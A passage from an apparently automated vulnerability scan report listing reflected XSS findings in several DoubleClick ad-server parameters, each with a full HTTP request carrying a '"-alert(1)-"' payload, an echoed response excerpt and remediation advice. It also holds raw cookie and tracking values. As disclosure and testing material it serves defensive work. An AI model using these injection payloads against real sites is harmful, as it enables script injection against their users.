Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 13 Feb 2011 18:02:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7380
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... zyAEJ2gFKZmlsZTovLy9DOi9Vc2Vycy9jcmF3bGVyL0RvY3VtZW50cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG24AhjIAq2L-hmoAwHRA4KN5ubLonGu6AO6AugDzQH1AwAAAMQ&num=1&sig=AGiWqtwYWRPDkNEftYzB5fG84_muYyZFaw419f5"-alert(1)-"d9e1c044134&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.enterpriseholdings.com/about-us/business-rental%3Futm_source%3DGoogle%2Butm_medium%3DOnline%26utm_campaign%3DBusiness_Rental"); var fscUrl = url; ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e1d6"-alert(1)-"ec3e2d54ab7 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N1558.150143.1172954780521/B5214024.6;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l1e1d6"-alert(1)-"ec3e2d54ab7&ai=B7HRFJxxYTYDwJczQlQfXxtmaC5XGqvYBhaae2x7AjbcB0ICCARABGAEgvs7lDTgAUJOX3br6_____wFgyYajh9SjgBCgAfuI8N0DugEJNzI4eDkwX2FzyAEJ2gFKZmlsZTovLy9DOi9Vc2Vycy9jcmF3bGVyL0RvY3VtZW50cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG24AhjIAq2L-hmoAwHRA4KN5ubLonGu6AO6AugDzQH1AwAAAMQ&num=1&sig=AGiWqtwYWRPDkNEftYzB5fG84_muYyZFaw&client=ca-pub-4063878933780912&adurl=;ord=1049337642? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297641628&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2FUsers%2Fcrawler%2FDocuments%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297620028788&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297620028811&frm=0&adk=200505236&ga_vid=614311644.1297620029&ga_sid=1297620029&ga_hid=1517882856&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1112&bih=1010&eid=30143103&fu=0&ifi=1&dtd=51&xpc=GMAjg2OnbV&p=file%3A// Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 13 Feb 2011 18:00:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7380
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/f/1af/%2a/y%3B235597078%3B0-0%3B0%3B59420406%3B3454-728/90%3B40452821/40470608/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l1e1d6"-alert(1)-"ec3e2d54ab7&ai=B7HRFJxxYTYDwJczQlQfXxtmaC5XGqvYBhaae2x7AjbcB0ICCARABGAEgvs7lDTgAUJOX3br6_____wFgyYajh9SjgBCgAfuI8N0DugEJNzI4eDkwX2FzyAEJ2gFKZmlsZTovLy9DOi9Vc2Vycy9jcmF3bGVyL0RvY3VtZW50cy9lbnRlcnByaXNlLWV4cGxvaXQt ...[SNIP]...
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0d68"-alert(1)-"3566a8a2c18 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5552.3159.GOOGLECN.COM/B4988140.18;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=BqX6JTwxYTeqUGufplQef56ShC-WUxIECpcrawx293_u4ZgAQARgBIL7O5Q04AFCF5vzj-_____8BYMmGo4fUo4AQsgEJbG9jYWxob3N0ugEJNzI4eDkwX2FzyAEJ2gFaaHR0cDovL2xvY2FsaG9zdC9leGFtcGxlcy9leHBsb2l0cy91cmktY2xpY2stdG8tZXhlY3V0ZS14c3MtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmcuaHRtbC5odG1smAL6AbgCGMACBcgCpY__GqgDAegDugLoA-IF9QMAAADE&num=1&sig=AGiWqty4OCemCEYbUfA29az7nmlfzud5oQ&client=ca-pub-4063878933780912&adurl=e0d68"-alert(1)-"3566a8a2c18 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297636642&flash=10.2.154&url=http%3A%2F%2Flocalhost%2Fexamples%2Fexploits%2Furi-click-to-execute-xss-cross-site-scripting.html.html&dt=1297615968703&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297615968724&frm=0&adk=1607234649&ga_vid=972795648.1297615969&ga_sid=1297615969&ga_hid=295279311&ga_fc=0&u_tz=-360&u_his=14&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1112&bih=1010&eid=30143103&ref=http%3A%2F%2Flocalhost%2F&fu=0&ifi=1&dtd=52&xpc=9d1f6bXzju&p=http%3A//localhost Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7444
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 13 Feb 2011 16:56:01 GMT
Expires: Sun, 13 Feb 2011 16:56:01 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 91cmktY2xpY2stdG8tZXhlY3V0ZS14c3MtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmcuaHRtbC5odG1smAL6AbgCGMACBcgCpY__GqgDAegDugLoA-IF9QMAAADE&num=1&sig=AGiWqty4OCemCEYbUfA29az7nmlfzud5oQ&client=ca-pub-4063878933780912&adurl=e0d68"-alert(1)-"3566a8a2c18http://www.hilton.com/en/hi/promotions/hiromance/index.jhtml?WT.mc_id=zWHWAAA0US1HH2DMH3DCDA4Romance7BR840908&cssiteid=1004575&csdartid=5784215540412926"); var fscUrl = url; var fscUrlClickTagFound = ...[SNIP]...
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a331"-alert(1)-"e0cdeb316aa was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5552.3159.GOOGLECN.COM/B4988140.18;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=BqX6JTwxYTeqUGufplQef56ShC-WUxIECpcrawx293_u4ZgAQARgBIL7O5Q04AFCF5vzj-_____8BYMmGo4fUo4AQsgEJbG9jYWxob3N0ugEJNzI4eDkwX2FzyAEJ2gFaaHR0cDovL2xvY2FsaG9zdC9leGFtcGxlcy9leHBsb2l0cy91cmktY2xpY2stdG8tZXhlY3V0ZS14c3MtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmcuaHRtbC5odG1smAL6AbgCGMACBcgCpY__GqgDAegDugLoA-IF9QMAAADE3a331"-alert(1)-"e0cdeb316aa&num=1&sig=AGiWqty4OCemCEYbUfA29az7nmlfzud5oQ&client=ca-pub-4063878933780912&adurl=;ord=1312776792? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297636642&flash=10.2.154&url=http%3A%2F%2Flocalhost%2Fexamples%2Fexploits%2Furi-click-to-execute-xss-cross-site-scripting.html.html&dt=1297615968703&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297615968724&frm=0&adk=1607234649&ga_vid=972795648.1297615969&ga_sid=1297615969&ga_hid=295279311&ga_fc=0&u_tz=-360&u_his=14&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1112&bih=1010&eid=30143103&ref=http%3A%2F%2Flocalhost%2F&fu=0&ifi=1&dtd=52&xpc=9d1f6bXzju&p=http%3A//localhost Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 13 Feb 2011 16:53:31 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7498
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... JbG9jYWxob3N0ugEJNzI4eDkwX2FzyAEJ2gFaaHR0cDovL2xvY2FsaG9zdC9leGFtcGxlcy9leHBsb2l0cy91cmktY2xpY2stdG8tZXhlY3V0ZS14c3MtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmcuaHRtbC5odG1smAL6AbgCGMACBcgCpY__GqgDAegDugLoA-IF9QMAAADE3a331"-alert(1)-"e0cdeb316aa&num=1&sig=AGiWqty4OCemCEYbUfA29az7nmlfzud5oQ&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.hilton.com/en/hi/promotions/hiromance/index.jhtml%3FWT.mc_id%3DzWHWAAA0US1HH2DMH3DCDA4Romance7BR84090 ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae9e7"-alert(1)-"52a73db6d13 was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5552.3159.GOOGLECN.COM/B4988140.18;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=BqX6JTwxYTeqUGufplQef56ShC-WUxIECpcrawx293_u4ZgAQARgBIL7O5Q04AFCF5vzj-_____8BYMmGo4fUo4AQsgEJbG9jYWxob3N0ugEJNzI4eDkwX2FzyAEJ2gFaaHR0cDovL2xvY2FsaG9zdC9leGFtcGxlcy9leHBsb2l0cy91cmktY2xpY2stdG8tZXhlY3V0ZS14c3MtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmcuaHRtbC5odG1smAL6AbgCGMACBcgCpY__GqgDAegDugLoA-IF9QMAAADE&num=1&sig=AGiWqty4OCemCEYbUfA29az7nmlfzud5oQ&client=ca-pub-4063878933780912ae9e7"-alert(1)-"52a73db6d13&adurl=;ord=1312776792? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297636642&flash=10.2.154&url=http%3A%2F%2Flocalhost%2Fexamples%2Fexploits%2Furi-click-to-execute-xss-cross-site-scripting.html.html&dt=1297615968703&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297615968724&frm=0&adk=1607234649&ga_vid=972795648.1297615969&ga_sid=1297615969&ga_hid=295279311&ga_fc=0&u_tz=-360&u_his=14&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1112&bih=1010&eid=30143103&ref=http%3A%2F%2Flocalhost%2F&fu=0&ifi=1&dtd=52&xpc=9d1f6bXzju&p=http%3A//localhost Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 13 Feb 2011 16:55:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7498
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... sb2l0cy91cmktY2xpY2stdG8tZXhlY3V0ZS14c3MtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmcuaHRtbC5odG1smAL6AbgCGMACBcgCpY__GqgDAegDugLoA-IF9QMAAADE&num=1&sig=AGiWqty4OCemCEYbUfA29az7nmlfzud5oQ&client=ca-pub-4063878933780912ae9e7"-alert(1)-"52a73db6d13&adurl=http%3a%2f%2fwww.hilton.com/en/hi/promotions/hiromance/index.jhtml%3FWT.mc_id%3DzWHWAAA0US1HH2DMH3DCDA4Romance7BR840908%26cssiteid%3D1004575%26csdartid%3D5784215540412926"); var fscUrl = url;
The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c264c"-alert(1)-"2c841495697 was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5552.3159.GOOGLECN.COM/B4988140.18;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=BqX6JTwxYTeqUGufplQef56ShC-WUxIECpcrawx293_u4ZgAQARgBIL7O5Q04AFCF5vzj-_____8BYMmGo4fUo4AQsgEJbG9jYWxob3N0ugEJNzI4eDkwX2FzyAEJ2gFaaHR0cDovL2xvY2FsaG9zdC9leGFtcGxlcy9leHBsb2l0cy91cmktY2xpY2stdG8tZXhlY3V0ZS14c3MtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmcuaHRtbC5odG1smAL6AbgCGMACBcgCpY__GqgDAegDugLoA-IF9QMAAADE&num=1c264c"-alert(1)-"2c841495697&sig=AGiWqty4OCemCEYbUfA29az7nmlfzud5oQ&client=ca-pub-4063878933780912&adurl=;ord=1312776792? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297636642&flash=10.2.154&url=http%3A%2F%2Flocalhost%2Fexamples%2Fexploits%2Furi-click-to-execute-xss-cross-site-scripting.html.html&dt=1297615968703&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297615968724&frm=0&adk=1607234649&ga_vid=972795648.1297615969&ga_sid=1297615969&ga_hid=295279311&ga_fc=0&u_tz=-360&u_his=14&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1112&bih=1010&eid=30143103&ref=http%3A%2F%2Flocalhost%2F&fu=0&ifi=1&dtd=52&xpc=9d1f6bXzju&p=http%3A//localhost
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 13 Feb 2011 16:54:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7498
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... Wxob3N0ugEJNzI4eDkwX2FzyAEJ2gFaaHR0cDovL2xvY2FsaG9zdC9leGFtcGxlcy9leHBsb2l0cy91cmktY2xpY2stdG8tZXhlY3V0ZS14c3MtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmcuaHRtbC5odG1smAL6AbgCGMACBcgCpY__GqgDAegDugLoA-IF9QMAAADE&num=1c264c"-alert(1)-"2c841495697&sig=AGiWqty4OCemCEYbUfA29az7nmlfzud5oQ&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.hilton.com/en/hi/promotions/hiromance/index.jhtml%3FWT.mc_id%3DzWHWAAA0US1HH2DMH3DCDA4Romance7BR840908%26cs ...[SNIP]...
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd1fa"-alert(1)-"b1a0019d98f was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5552.3159.GOOGLECN.COM/B4988140.18;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=BqX6JTwxYTeqUGufplQef56ShC-WUxIECpcrawx293_u4ZgAQARgBIL7O5Q04AFCF5vzj-_____8BYMmGo4fUo4AQsgEJbG9jYWxob3N0ugEJNzI4eDkwX2FzyAEJ2gFaaHR0cDovL2xvY2FsaG9zdC9leGFtcGxlcy9leHBsb2l0cy91cmktY2xpY2stdG8tZXhlY3V0ZS14c3MtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmcuaHRtbC5odG1smAL6AbgCGMACBcgCpY__GqgDAegDugLoA-IF9QMAAADE&num=1&sig=AGiWqty4OCemCEYbUfA29az7nmlfzud5oQcd1fa"-alert(1)-"b1a0019d98f&client=ca-pub-4063878933780912&adurl=;ord=1312776792? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297636642&flash=10.2.154&url=http%3A%2F%2Flocalhost%2Fexamples%2Fexploits%2Furi-click-to-execute-xss-cross-site-scripting.html.html&dt=1297615968703&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297615968724&frm=0&adk=1607234649&ga_vid=972795648.1297615969&ga_sid=1297615969&ga_hid=295279311&ga_fc=0&u_tz=-360&u_his=14&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1112&bih=1010&eid=30143103&ref=http%3A%2F%2Flocalhost%2F&fu=0&ifi=1&dtd=52&xpc=9d1f6bXzju&p=http%3A//localhost
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 13 Feb 2011 16:54:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7498
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... L2xvY2FsaG9zdC9leGFtcGxlcy9leHBsb2l0cy91cmktY2xpY2stdG8tZXhlY3V0ZS14c3MtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmcuaHRtbC5odG1smAL6AbgCGMACBcgCpY__GqgDAegDugLoA-IF9QMAAADE&num=1&sig=AGiWqty4OCemCEYbUfA29az7nmlfzud5oQcd1fa"-alert(1)-"b1a0019d98f&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.hilton.com/en/hi/promotions/hiromance/index.jhtml%3FWT.mc_id%3DzWHWAAA0US1HH2DMH3DCDA4Romance7BR840908%26cssiteid%3D1004575%26csdartid%3D578421554 ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46e56"-alert(1)-"c4ad023023d was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5552.3159.GOOGLECN.COM/B4988140.18;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L46e56"-alert(1)-"c4ad023023d&ai=BqX6JTwxYTeqUGufplQef56ShC-WUxIECpcrawx293_u4ZgAQARgBIL7O5Q04AFCF5vzj-_____8BYMmGo4fUo4AQsgEJbG9jYWxob3N0ugEJNzI4eDkwX2FzyAEJ2gFaaHR0cDovL2xvY2FsaG9zdC9leGFtcGxlcy9leHBsb2l0cy91cmktY2xpY2stdG8tZXhlY3V0ZS14c3MtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmcuaHRtbC5odG1smAL6AbgCGMACBcgCpY__GqgDAegDugLoA-IF9QMAAADE&num=1&sig=AGiWqty4OCemCEYbUfA29az7nmlfzud5oQ&client=ca-pub-4063878933780912&adurl=;ord=1312776792? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297636642&flash=10.2.154&url=http%3A%2F%2Flocalhost%2Fexamples%2Fexploits%2Furi-click-to-execute-xss-cross-site-scripting.html.html&dt=1297615968703&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297615968724&frm=0&adk=1607234649&ga_vid=972795648.1297615969&ga_sid=1297615969&ga_hid=295279311&ga_fc=0&u_tz=-360&u_his=14&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1112&bih=1010&eid=30143103&ref=http%3A%2F%2Flocalhost%2F&fu=0&ifi=1&dtd=52&xpc=9d1f6bXzju&p=http%3A//localhost
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 13 Feb 2011 16:53:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7498
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/f/1c4/%2a/x%3B235706078%3B0-0%3B0%3B57842155%3B3454-728/90%3B40412926/40430713/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=L46e56"-alert(1)-"c4ad023023d&ai=BqX6JTwxYTeqUGufplQef56ShC-WUxIECpcrawx293_u4ZgAQARgBIL7O5Q04AFCF5vzj-_____8BYMmGo4fUo4AQsgEJbG9jYWxob3N0ugEJNzI4eDkwX2FzyAEJ2gFaaHR0cDovL2xvY2FsaG9zdC9leGFtcGxlcy9leHBsb2l0cy91cmktY2xpY2stdG8tZXhl ...[SNIP]...
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12f8f"-alert(1)-"d4934f0edbb was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
